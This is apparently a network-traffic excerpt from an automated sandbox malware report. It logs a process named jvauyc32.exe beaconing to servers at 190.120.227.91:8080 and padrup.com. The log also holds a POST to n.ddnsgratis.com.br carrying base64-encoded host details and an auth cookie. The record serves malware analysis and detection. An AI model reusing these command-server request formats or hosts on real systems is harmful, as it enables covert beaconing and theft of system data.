Data Ascii: t.trim() === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } }
Oct 18, 2024 12:44:40.244462967 CEST | 340 | IN
Data Ascii: 08b3c740fdad9d');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.9 | 50045 | 190.120.227.91 | 8080 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:44:40.549698114 CEST | 169 | OUT | GET /sobakavolos.gif?2a895223=713642531 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.9 | 50046 | 185.53.178.50 | 80 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:44:46.237698078 CEST | 157 | OUT | GET /sobaka1.gif?2b0ab4f0=-684357456 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 12:44:47.270262003 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:44:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_PTOxAN3e+SCt8pWrIOcgQs8TjOb0NYC/Ej/lt3VUXfPl5AoA2Ah9VjAX/dibQ6BJd7V7ehmrSBKFn5KcotCmvQ==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Ascii: 8d9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 12:44:47.270283937 CEST | 1236 | IN
Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODI4Ni45MTg4OjdkY2NhNTY1NmM4NDIwNzE5OGRhMGNjMjM4MDFhMmJhYWM3MjY5MDdmMmIwMDcyOWNhNjMwMDRjZDlhNDRjNzk6NjcxMjNjMWVlMDUzNg==';
Oct 18, 2024 12:44:47.270302057 CEST | 424 | IN
Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
Oct 18, 2024 12:44:47.270313025 CEST | 333 | IN
Data Ascii: 71700cf');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.href = "


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.9 | 50047 | 194.5.152.215 | 80 | 7352 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:44:46.885612011 CEST | 453 | OUT | POST /n/tasks.php HTTP/1.0
Host: n.ddnsgratis.com.br
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0
Content-type: application/x-www-form-urlencoded
Cookie: auth=bc00595440e801f8a5d2a2ad13b9791b
Content-length: 192
Data Ascii: _wv=Y21kJjllMTQ2YmU5LWM3NmEtNDcyMC1iY2RiLTUzMDExYjg3YmQwNiZkR2x1WVNBNklGUkpUa0V0VUVNZ09pQTROemcwTVRFJTNEJldpbmRvd3MlMjAxMCUyMCg2NC1iaXQpJjEmV2luZG93cyUyMERlZmVuZGVyJjUuMSYxOC4xMC4yMDI0Jk5PTkU=
Oct 18, 2024 12:44:52.925184011 CEST | 606 | IN | HTTP/1.1 404 Not Found
Date: Fri, 18 Oct 2024 10:44:47 GMT
Server: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.14
X-Powered-By: PHP/5.6.14
Status: 404 Not Found
Content-Length: 377
Content-Type: text/html; charset=utf8
                                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /n/tasks.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>...-MTQwMTA3NjM4NjcxNTc2NiNyYXRlIDUj--->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.9 | 50048 | 190.120.227.91 | 8080 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:44:47.521785975 CEST | 169 | OUT | GET /sobakavolos.gif?2b436842=725837890 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.9 | 50049 | 185.53.178.50 | 80 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:44:52.174532890 CEST | 158 | OUT | GET /sobaka1.gif?2bc60f28=-2091766408 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 12:44:53.223341942 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:44:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_n886BxQLr0Ra5VmrnsI6bCocEzqgSER+Fo8chgYLVve1F8jWMPjJtQW05T0oI6c7+2ZBIxa8wHyuaBtZv2HTkA==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 31 66 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 1f7<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 12:44:53.223366976 CEST | 1236 | IN | Data Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODI5Mi44NjkxOjgxMGEwOTdkZmRiYmEyN2FkYTcwMDVlZDEyNGFlM2RhNWViNGFhOTRlYzc4NGE2MmU2NTFlNGEyMzEzZTQ0YTg6Njc6e2xMjNjMjRkNDJ
Oct 18, 2024 12:44:53.223381996 CEST | 764 | IN | Data Raw: 74 2e 74 72 69 6d 28 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                          Data Ascii: t.trim() === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } }


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.9 | 50050 | 190.120.227.91 | 8080 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:44:53.642582893 CEST | 171 | OUT | GET /sobakavolos.gif?2be56550=-1225394912 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.9 | 50051 | 185.53.178.50 | 80 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:44:58.051703930 CEST | 158 | OUT | GET /sobaka1.gif?2e00e35c=-1979536876 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 12:44:59.153179884 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:44:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_hkX6cyZ07LUo7LuFH+m3gh18P8rUGXFdbGkK4INWX8QDIy50Hil0yKoPRf2Yga5vcMJmP7BIMdkbDbDPfTDGmg==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:59.153238058 CEST224INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODI5OC43ODU2OjNkMzRiYzE4MDBmMmRmZWQ2NDEyZjliNDhjMzBjNTMxYThmYWM0YjQ4MWNjNGQ2ZGU4ZjJmY2RjMzY1ZjdmNmU6Njc
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:59.153280020 CEST1236INData Raw: 78 4d 6a 4e 6a 4d 6d 46 69 5a 6d 4e 6b 59 77 3d 3d 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65 6d 65 64 61 74 61 20 3d 20 27 27 3b 0a 76 61 72 20 78 6b 77 20 3d 20 27 27 3b 0a 76
                                                                                                                                                                                                                                                                                          Data Ascii: xMjNjMmFiZmNkYw==';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '';</script>
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:59.153316021 CEST540INData Raw: 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73 2e 70 27 20 2b 20 27 68 70 3f 74 3d 36 37 31 32 33 63 32 62 26 74 6f 6b 65 6e 3d 27
                                                                                                                                                                                                                                                                                          Data Ascii: } } } xhr.open('GET', path + '/ls.p' + 'hp?t=67123c2b&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, 'cbc227fd7d1ffa049f7bfb6381b07c4e31462ee6a85');</script><script type='


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          70192.168.2.950052190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:59.245826960 CEST169OUTGET /sobakavolos.gif?2e54b34b=777302859 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          71192.168.2.950053185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:03.738311052 CEST158OUTGET /sobaka1.gif?2ff37fd5=-1349550467 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:04.962414026 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:45:04 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_kF/3xdliG72JxMjNvQwvXiOY0HhaT4bnF1To5NcnASbPKuC+8t2/hrh+orj7UUKwmRVh1QNcvvZPokOXslJjfw==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:04.962460041 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODMwNC41ODM6ZWYxNzZhMWZkMGQ1NTRjOGQwMzZjMzI2Y2RmMjJlYTIzYWRlNzliYzI2MGM5YmVlNGI5MWIwNTcxZmNiYWY1YTo2NzEyM2MzMDhlNTdl';var
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:04.962475061 CEST424INData Raw: 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65
                                                                                                                                                                                                                                                                                          Data Ascii: = '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:04.964313030 CEST336INData Raw: 0d 0a 31 34 32 0d 0a 39 36 36 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 77 69 6e
                                                                                                                                                                                                                                                                                          Data Ascii: 142966');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.href


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          72192.168.2.950054190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:05.488503933 CEST170OUTGET /sobakavolos.gif?308e5400=-443594752 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          73192.168.2.950055185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:10.036904097 CEST157OUTGET /sobaka1.gif?311dbd80=1473261184 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:11.223932028 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
Date: Fri, 18 Oct 2024 10:45:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_L/I+dWTkInNk/DSuU6jAmEEA8WMOTFqbm2nPeOyi/GwhdVjuQN6ALjbssQIjv0Uz5BuuXoPGmjsEgAFIlrTq7g==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Timestamp: Oct 18, 2024 12:45:11.223968983 CEST | Bytes transferred: 1236 | Direction: IN
